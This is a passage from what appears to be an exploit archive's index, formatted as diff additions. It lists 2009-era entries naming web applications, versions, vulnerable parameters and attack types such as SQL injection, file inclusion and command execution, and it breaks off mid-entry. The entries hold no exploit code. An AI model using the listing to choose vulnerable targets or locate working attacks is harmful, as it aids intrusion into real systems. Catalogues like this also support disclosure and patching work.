+7927,exploits/php/webapps/7927.txt,"GNUBoard 4.31.04 (09.01.30) - Multiple Local/Remote Vulnerabilities",2009-01-30,make0day,webapps,php, +7930,exploits/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",webapps,php, +7931,exploits/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,webapps,php, +7932,exploits/php/webapps/7932.txt,"SkaLinks 1.5 - Authentication Bypass",2009-01-30,Dimi4,webapps,php, +7933,exploits/php/webapps/7933.txt,"eVision CMS 2.0 - SQL Injection",2009-01-30,darkjoker,webapps,php, +7936,exploits/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,webapps,php, +7938,exploits/php/webapps/7938.txt,"Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",webapps,php, +7939,exploits/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,webapps,php, +7940,exploits/php/webapps/7940.txt,"WholeHogSoftware Ware Support - Authentication Bypass",2009-02-02,ByALBAYX,webapps,php, +7941,exploits/php/webapps/7941.txt,"WholeHogSoftware Password Protect - Authentication Bypass",2009-02-02,ByALBAYX,webapps,php, +7944,exploits/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - Blind SQL Injection",2009-02-02,darkjoker,webapps,php, +7945,exploits/php/webapps/7945.php,"CMS Mini 0.2.2 - Remote Command Execution",2009-02-02,darkjoker,webapps,php, +7946,exploits/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,webapps,php, +7947,exploits/php/webapps/7947.pl,"eVision CMS 2.0 - Remote Code Execution",2009-02-02,Osirys,webapps,php, +7948,exploits/php/webapps/7948.php,"PHPSlash 0.8.1.1 - Remote Code Execution",2009-02-02,DarkFig,webapps,php, +7949,exploits/php/webapps/7949.rb,"OpenHelpDesk 1.0.100 - 'eval()' Code Execution (Metasploit)",2009-02-02,LSO,webapps,php, +18164,exploits/android/webapps/18164.php,"Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",webapps,android, +7951,exploits/php/webapps/7951.txt,"WholeHogSoftware Ware Support - Insecure Cookie Handling",2009-02-03,Stack,webapps,php, +7952,exploits/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,webapps,php, +7953,exploits/php/webapps/7953.txt,"ClickCart 6.0 - Authentication Bypass",2009-02-03,R3d-D3V!L,webapps,php, +7954,exploits/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",webapps,php, +7955,exploits/php/webapps/7955.txt,"groone's Guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",webapps,php, +7956,exploits/php/webapps/7956.txt,"Online Grades 3.2.4 - Authentication Bypass",2009-02-03,x0r,webapps,php, +7959,exploits/php/webapps/7959.txt,"Simple Machines Forum (SMF) - 'BBCode' Cookie Stealing",2009-02-03,Xianur0,webapps,php, +7960,exploits/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",webapps,php, +7961,exploits/php/webapps/7961.php,"WEBalbum 2.4b - 'id' Blind SQL Injection",2009-02-03,"Mehmet Ince",webapps,php, +7963,exploits/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,webapps,asp, +7964,exploits/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,webapps,php, +7965,exploits/php/webapps/7965.txt,"Technote 7.2 - Remote File Inclusion",2009-02-03,make0day,webapps,php, +7967,exploits/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,webapps,php, +7968,exploits/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",webapps,php, +7969,exploits/php/webapps/7969.txt,"Flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",webapps,php, +7972,exploits/php/webapps/7972.py,"OpenFiler 2.3 - (Authentication Bypass) Remote Password Change",2009-02-03,nonroot,webapps,php, +7976,exploits/php/webapps/7976.txt,"Jaws 0.8.8 - Multiple Local File Inclusions",2009-02-04,fuzion,webapps,php, +7977,exploits/php/webapps/7977.txt,"Syntax Desktop 2.7 - 'synTarget' Local File Inclusion",2009-02-04,ahmadbady,webapps,php, +7978,exploits/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,webapps,php, +7979,exploits/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusions",2009-02-04,make0day,webapps,php, +7980,exploits/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php?l' Local File Inclusion",2009-02-04,Osirys,webapps,php, +7981,exploits/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,webapps,asp, +7982,exploits/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,webapps,asp, +7984,exploits/php/webapps/7984.pl,"YapBB 1.2 - 'forumID' Blind SQL Injection",2009-02-04,darkjoker,webapps,php, +7987,exploits/php/webapps/7987.txt,"gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass",2009-02-04,JosS,webapps,php, +7991,exploits/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,webapps,asp, +7992,exploits/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,webapps,php, +7993,exploits/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,webapps,php, +7996,exploits/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Disclosure",2009-02-05,Room-Hacker,webapps,php, +7997,exploits/php/webapps/7997.html,"txtBB 1.0 RC3 - HTML/JS Injection / Arbitrary Add Admin Privileges",2009-02-05,cOndemned,webapps,php, +7998,exploits/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Arbitrary '.PHP' File Upload",2009-02-06,ByALBAYX,webapps,php, +7999,exploits/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,webapps,php, +8000,exploits/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,webapps,php, +8001,exploits/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,webapps,php, +8002,exploits/php/webapps/8002.txt,"CafeEngine - 'catid' SQL Injection",2009-02-06,SuNHouSe2,webapps,php, +8003,exploits/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution / Remote File Inclusion",2009-02-06,JosS,webapps,php, +8004,exploits/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,webapps,php, +8005,exploits/php/webapps/8005.txt,"phpYabs 0.1.2 - 'Azione' Remote File Inclusion",2009-02-06,Arka69,webapps,php, +8006,exploits/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,webapps,php, +8007,exploits/php/webapps/8007.php,"IF-CMS 2.0 - 'id' Blind SQL Injection",2009-02-09,darkjoker,webapps,php, +8009,exploits/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,webapps,php, +8011,exploits/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,webapps,php, +8012,exploits/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,webapps,php, +8014,exploits/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,webapps,php, +8015,exploits/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,webapps,php, +8016,exploits/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,webapps,php, +8017,exploits/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,webapps,php, +8018,exploits/php/webapps/8018.txt,"FlexCMS 2.5 - 'catId' SQL Injection",2009-02-09,MisterRichard,webapps,php, +8019,exploits/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) - Cross-Site Scripting",2009-02-09,make0day,webapps,php, +8020,exploits/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,webapps,php, +8025,exploits/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusions",2009-02-09,ahmadbady,webapps,php, +8026,exploits/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,webapps,php, +8027,exploits/php/webapps/8027.txt,"Gaeste 1.6 - 'gastbuch.php' Remote File Disclosure",2009-02-09,bd0rk,webapps,php, +8028,exploits/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution",2009-02-09,Osirys,webapps,php, +8029,exploits/php/webapps/8029.txt,"Thyme 1.3 - 'export_to' Local File Inclusion",2009-02-10,cheverok,webapps,php, +8030,exploits/php/webapps/8030.txt,"Papoo CMS 3.x - 'pfadhier' Local File Inclusion",2009-02-10,SirGod,webapps,php, +8031,exploits/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,webapps,php, +8032,exploits/php/webapps/8032.txt,"Potato News 1.0.0 - Local File Inclusion",2009-02-10,x0r,webapps,php, +8033,exploits/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,webapps,php, +8034,exploits/php/webapps/8034.txt,"Mynews 0.10 - Authentication Bypass",2009-02-10,x0r,webapps,php, +8035,exploits/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,webapps,php, +8036,exploits/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,webapps,php, +8038,exploits/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - 'jumpUrl' Remote File Disclosure",2009-02-10,Lolek,webapps,php, +8039,exploits/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,webapps,php, +8040,exploits/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,webapps,php, +8042,exploits/php/webapps/8042.txt,"dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure",2009-02-11,"Mehmet Ince",webapps,php, +8043,exploits/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - 'id' SQL Injection",2009-02-11,Osirys,webapps,php, +8044,exploits/php/webapps/8044.txt,"Den Dating 9.01 - 'txtlookgender' SQL Injection",2009-02-11,nuclear,webapps,php, +8045,exploits/php/webapps/8045.pl,"InselPhoto 1.1 - 'query' SQL Injection",2009-02-11,Osirys,webapps,php, +8046,exploits/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'id' SQL Injection",2009-02-12,x0r,webapps,php, +8047,exploits/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass",2009-02-12,Muhacir,webapps,php, +8048,exploits/asp/webapps/8048.txt,"Baran CMS 1.0 - 'Arbitrary '.ASP' File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",webapps,asp, +8049,exploits/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,webapps,php, +8050,exploits/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,webapps,php, +8052,exploits/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion",2009-02-13,bd0rk,webapps,php, +8053,exploits/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,webapps,php, +8054,exploits/php/webapps/8054.pl,"CmsFaethon 2.2.0 - 'item' SQL Injection",2009-02-13,Osirys,webapps,php, +8057,exploits/php/webapps/8057.txt,"InselPhoto 1.1 - Cross-Site Scripting",2009-02-16,rAWjAW,webapps,php, +8060,exploits/php/webapps/8060.php,"Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload",2009-02-16,Sp3shial,webapps,php, +8061,exploits/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution",2009-02-16,Osirys,webapps,php, +8062,exploits/php/webapps/8062.txt,"powermovielist 0.14b - SQL Injection / Cross-Site Scripting",2009-02-16,brain[pillow],webapps,php, +8063,exploits/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],webapps,php, +8064,exploits/php/webapps/8064.pl,"MemHT Portal 4.0.1 - Delete All Private Messages",2009-02-16,StAkeR,webapps,php, +8065,exploits/asp/webapps/8065.txt,"SAS Hotel Management System - 'id' SQL Injection",2009-02-16,Darkb0x,webapps,asp, +8066,exploits/php/webapps/8066.txt,"YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion",2009-02-16,ahmadbady,webapps,php, +8068,exploits/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,webapps,php, +8069,exploits/php/webapps/8069.txt,"Grestul 1.x - Cookie Authentication Bypass",2009-02-16,x0r,webapps,php, +8070,exploits/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,webapps,asp, +8071,exploits/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete",2009-02-17,x0r,webapps,php, +8072,exploits/php/webapps/8072.txt,"pHNews Alpha 1 - 'mod' SQL Injection",2009-02-17,x0r,webapps,php, +8073,exploits/php/webapps/8073.txt,"pHNews Alpha 1 - 'genbackup.php' Database Disclosure",2009-02-17,x0r,webapps,php, +8075,exploits/php/webapps/8075.pl,"Firepack - '/admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,webapps,php, +8076,exploits/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass / Column Truncation",2009-02-18,x0r,webapps,php, +8083,exploits/php/webapps/8083.txt,"phpBB 3 - 'autopost bot mod 0.1.3' Remote File Inclusion",2009-02-20,Kacper,webapps,php, +8085,exploits/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,webapps,cgi, +8086,exploits/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,webapps,cgi, +8087,exploits/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,webapps,cgi, +8088,exploits/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - 'admin.txt' File Disclosure",2009-02-20,Pouya_Server,webapps,php, +8089,exploits/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection / SQL Injection",2009-02-20,Osirys,webapps,php, +8092,exploits/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated Admin Bypass",2009-02-23,ahmadbady,webapps,php, +8093,exploits/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,webapps,php, +8094,exploits/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,webapps,php, +8095,exploits/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,webapps,php, +8098,exploits/php/webapps/8098.txt,"taifajobs 1.0 - 'jobid' SQL Injection",2009-02-23,K-159,webapps,php, +8100,exploits/php/webapps/8100.pl,"MDPro Module My_eGallery - 'pid' SQL Injection",2009-02-23,StAkeR,webapps,php, +8101,exploits/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,webapps,php, +8104,exploits/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,webapps,php, +8105,exploits/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",webapps,php, +8107,exploits/asp/webapps/8107.txt,"PenPal 2.0 - Authentication Bypass",2009-02-25,ByALBAYX,webapps,asp, +8109,exploits/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,webapps,asp, +8110,exploits/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,webapps,asp, +8111,exploits/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,webapps,asp, +8112,exploits/php/webapps/8112.txt,"Golabi CMS 1.0 - Remote File Inclusion",2009-02-26,CrazyAngel,webapps,php, +8113,exploits/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,webapps,asp, +8114,exploits/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - BBCode IMG Privilege Escalation",2009-02-26,StAkeR,webapps,php, +8115,exploits/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - 'IMG' Privilege Escalation",2009-02-26,Inphex,webapps,php, +8116,exploits/php/webapps/8116.txt,"BannerManager 0.81 - Authentication Bypass",2009-02-26,rootzig,webapps,php, +8120,exploits/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,webapps,asp, +8123,exploits/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,webapps,php, +8124,exploits/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,webapps,php, +8127,exploits/php/webapps/8127.txt,"Blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",webapps,php, +8128,exploits/php/webapps/8128.txt,"EZ-Blog beta1 - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",webapps,php, +8130,exploits/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,webapps,asp, +8131,exploits/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,webapps,asp, +8132,exploits/asp/webapps/8132.txt,"Access2asp - 'imageLibrar' Arbitrary File Upload",2009-03-02,mr.al7rbi,webapps,asp, +8133,exploits/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling",2009-03-02,x0r,webapps,php, +8134,exploits/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,webapps,php, +8136,exploits/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",webapps,php, +8139,exploits/php/webapps/8139.txt,"ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting",2009-03-02,"Salvatore Fresta",webapps,php, +8140,exploits/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,webapps,php, +8141,exploits/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",webapps,php, +8145,exploits/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,webapps,php, +8150,exploits/php/webapps/8150.txt,"Novaboard 1.0.1 - Cross-Site Scripting",2009-03-03,Pepelux,webapps,php, +8151,exploits/php/webapps/8151.txt,"Jogjacamp JProfile Gold - 'id_news' SQL Injection",2009-03-03,kecemplungkalen,webapps,php, +8161,exploits/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",webapps,php, +8164,exploits/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,webapps,php, +8165,exploits/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,webapps,php, +8166,exploits/php/webapps/8166.txt,"Wili-CMS 0.4.0 - Local File Inclusion / Remote File Inclusion / Authentication Bypass",2009-03-06,"Salvatore Fresta",webapps,php, +8167,exploits/php/webapps/8167.txt,"isiAJAX 1 - 'praises.php?id' SQL Injection",2009-03-06,dun,webapps,php, +8168,exploits/php/webapps/8168.txt,"OneOrZero Helpdesk 1.6.5.7 - Local File Inclusion",2009-03-06,dun,webapps,php, +8170,exploits/php/webapps/8170.txt,"nForum 1.5 - Multiple SQL Injections",2009-03-09,"Salvatore Fresta",webapps,php, +8172,exploits/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,webapps,php, +8181,exploits/php/webapps/8181.c,"PHP Director 0.21 - SQL Into Outfile 'eval()' Injection",2009-03-09,StAkeR,webapps,php, +8182,exploits/php/webapps/8182.txt,"PHPRecipeBook 2.24 - 'base_id' SQL Injection",2009-03-09,d3b4g,webapps,php, +8183,exploits/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,webapps,php, +8184,exploits/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection",2009-03-09,netsoul,webapps,php, +8185,exploits/php/webapps/8185.txt,"phpCommunity 2.1.8 - SQL Injection / Directory Traversal / Cross-Site Scripting",2009-03-09,"Salvatore Fresta",webapps,php, +8186,exploits/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - 'bookid' SQL Injection",2009-03-09,elusiven,webapps,php, +8188,exploits/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injections",2009-03-10,M3NW5,webapps,php, +8194,exploits/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - 'course_id' SQL Injection",2009-03-10,SuB-ZeRo,webapps,php, +8195,exploits/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusions",2009-03-10,K-159,webapps,php, +8196,exploits/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",webapps,php, +8197,exploits/php/webapps/8197.txt,"Joomla! Component Djice Shoutbox 1.0 - Persistent Cross-Site Scripting",2009-03-10,XaDoS,webapps,php, +8198,exploits/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",webapps,php, +8202,exploits/php/webapps/8202.html,"Traidnt up 2.0 - 'cookie' Add Extension Bypass",2009-03-11,SP4rT,webapps,php, +8204,exploits/php/webapps/8204.txt,"phpmysport 1.4 - Cross-Site Scripting / SQL Injection",2009-03-12,XaDoS,webapps,php, +8207,exploits/php/webapps/8207.txt,"YAP 1.1.1 - 'index.php' Local File Inclusion",2009-03-13,Alkindiii,webapps,php, +8209,exploits/php/webapps/8209.txt,"Kim Websites 1.0 - Authentication Bypass",2009-03-13,"Virangar Security",webapps,php, +8210,exploits/php/webapps/8210.txt,"UBBCentral UBB.Threads 5.5.1 - 'message' SQL Injection",2009-03-16,s4squatch,webapps,php, +8216,exploits/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection",2009-03-16,SirGod,webapps,php, +8217,exploits/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection / SQL Injection",2009-03-16,SirGod,webapps,php, +8220,exploits/php/webapps/8220.txt,"phpComasy 0.9.1 - 'entry_id' SQL Injection",2009-03-16,boom3rang,webapps,php, +8226,exploits/php/webapps/8226.txt,"PHPRunner 4.2 - 'SearchOption' Blind SQL Injection",2009-03-17,BugReport.IR,webapps,php, +8228,exploits/php/webapps/8228.txt,"GDL 4.x - 'node' SQL Injection",2009-03-17,g4t3w4y,webapps,php, +8229,exploits/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",webapps,php, +8230,exploits/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - 'url' Remote File Inclusion",2009-03-17,Garry,webapps,php, +8237,exploits/php/webapps/8237.txt,"Facil-CMS 0.1RC2 - Multiple Vulnerabilities",2009-03-18,any.zicky,webapps,php, +8238,exploits/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' Blind SQL Injection",2009-03-18,boom3rang,webapps,php, +8239,exploits/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",webapps,php, +8240,exploits/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' SQL Injection",2009-03-18,girex,webapps,php, +8243,exploits/php/webapps/8243.txt,"Bloginator 1a - Cookie Bypass / SQL Injection",2009-03-19,Fireshot,webapps,php, +8244,exploits/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass )",2009-03-19,Fireshot,webapps,php, +8247,exploits/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",webapps,cgi, +8252,exploits/php/webapps/8252.txt,"Pixie CMS - Cross-Site Scripting / SQL Injection",2009-03-20,"Justin Keane",webapps,php, +8254,exploits/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - 'UserGallery' Blind SQL Injection",2009-03-23,Invisibility,webapps,php, +8255,exploits/php/webapps/8255.txt,"Supernews 1.5 - 'valor.php?noticia' SQL Injection",2009-03-23,p3s0k!,webapps,php, +8258,exploits/php/webapps/8258.pl,"X-BLC 0.2.0 - 'get_read.php?section' SQL Injection",2009-03-23,dun,webapps,php, +8268,exploits/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution",2009-03-23,YOUCODE,webapps,php, +8271,exploits/php/webapps/8271.php,"Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion",2009-03-23,"Alfons Luja",webapps,php, +8272,exploits/php/webapps/8272.pl,"Codice CMS 2 - Command Execution (via SQL Injection)",2009-03-23,darkjoker,webapps,php, +8276,exploits/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Injection",2009-03-23,Osirys,webapps,php, +8277,exploits/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass / Arbitrary File Upload",2009-03-23,Mr.Skonnie,webapps,php, +8278,exploits/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - 'name' Local File Inclusion",2009-03-24,dun,webapps,php, +8279,exploits/php/webapps/8279.txt,"PHPizabi 0.848b C1 HFP1 - Privilege Escalation",2009-03-24,Nine:Situations:Group,webapps,php, +8282,exploits/php/webapps/8282.txt,"SurfMyTV Script 1.0 - 'view.php?id' SQL Injection",2009-03-24,x0r,webapps,php, +8287,exploits/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,webapps,php, +8288,exploits/php/webapps/8288.txt,"WeBid 0.7.3 RC9 - 'upldgallery.php' Arbitrary File Upload",2009-03-25,"Ahmad Pay",webapps,php, +8289,exploits/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution",2009-03-26,Osirys,webapps,php, +8290,exploits/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusions",2009-03-26,ahmadbady,webapps,php, +8291,exploits/php/webapps/8291.txt,"acute control panel 1.0.0 - SQL Injection / Remote File Inclusion",2009-03-26,SirGod,webapps,php, +8292,exploits/php/webapps/8292.txt,"Simply Classified 0.2 - 'category_id' SQL Injection",2009-03-27,G4N0K,webapps,php, +8293,exploits/php/webapps/8293.txt,"Free PHP Petition Signing Script - Authentication Bypass",2009-03-27,Qabandi,webapps,php, +8296,exploits/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",webapps,php, +8297,exploits/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",webapps,php, +8298,exploits/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,webapps,php, +8302,exploits/php/webapps/8302.php,"glFusion 1.1.2 - 'COM_applyFilter()/order' SQL Injection",2009-03-29,Nine:Situations:Group,webapps,php, +8304,exploits/php/webapps/8304.txt,"Arcadwy Arcade Script - (Authentication Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,webapps,php, +8305,exploits/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injections",2009-03-29,boom3rang,webapps,php, +8307,exploits/asp/webapps/8307.txt,"Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass",2009-03-30,AnGeL25dZ,webapps,asp, +8309,exploits/php/webapps/8309.txt,"BandSite CMS 1.1.4 - 'members.php' SQL 